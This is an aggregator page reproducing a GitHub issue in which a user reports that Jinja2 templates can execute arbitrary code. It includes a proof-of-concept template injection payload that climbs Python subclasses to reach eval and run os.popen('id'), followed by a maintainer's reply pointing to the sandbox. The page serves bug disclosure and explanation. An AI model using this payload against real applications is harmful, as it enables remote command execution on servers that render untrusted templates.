Stuck on an issue?
Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
Execute arbitrary codes in template without sandbox environment.
See original GitHub issueWhen i use Jinja2 template framework in my project, i found a way to call “os.popen(‘id’)” or another functions without global register. It’s easy to get shell when attacker can control the template content. Is that such a design?
PoC:
from jinja2 import Template
content = '''
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %} {% endif %} {% endfor %}
{% endif %} {% endfor %}
'''
print Template(content).render()
I test this code with python2 (2.7.10) and Jinja2 (2.8), if it works will print your user’s uid…
Issue Analytics
- State:
- Created 8 years ago
- Reactions:1
- Comments:6 (3 by maintainers)
Top Results From Across the Web
Building a secure/sandboxed environment for executing ...
The application of sandbox is obvious, you can execute the code which you don't trust without worrying about security much.
Read more >Execute arbitrary code in the Jinja2 template using the Python ...
In the Jinja2 template, you can use the sandbox environment jinja2.sandbox that comes with Jinja2 to prevent arbitrary code execution by ...
Read more >Sandboxed JavaScript | Google Tag Manager Templates
Sandboxed JavaScript is a simplified subset of the JavaScript language that provides a safe way to execute arbitrary JavaScript logic from Google Tag...
Read more >python - Best practices for execution of untrusted code
The best practice for executing untrusted code is to segregate it via a system sandbox. For the most security:
Read more >Sandboxing in Linux with zero lines of code
In this post we will review Linux seccomp and learn how to sandbox any (even a proprietary) application without writing a single line...
Read more >
Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free
Top Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
You should not execute untrusted templates in a non-sandboxed environment. That’s exactly why the sandbox exists (and to be honest, even with a sandbox I would not let users provide arbitrary Jinja templates)
Enabling sandboxing by default is not possible due to backwards compat, and also not reasonable because most templates (in Flask) are trusted.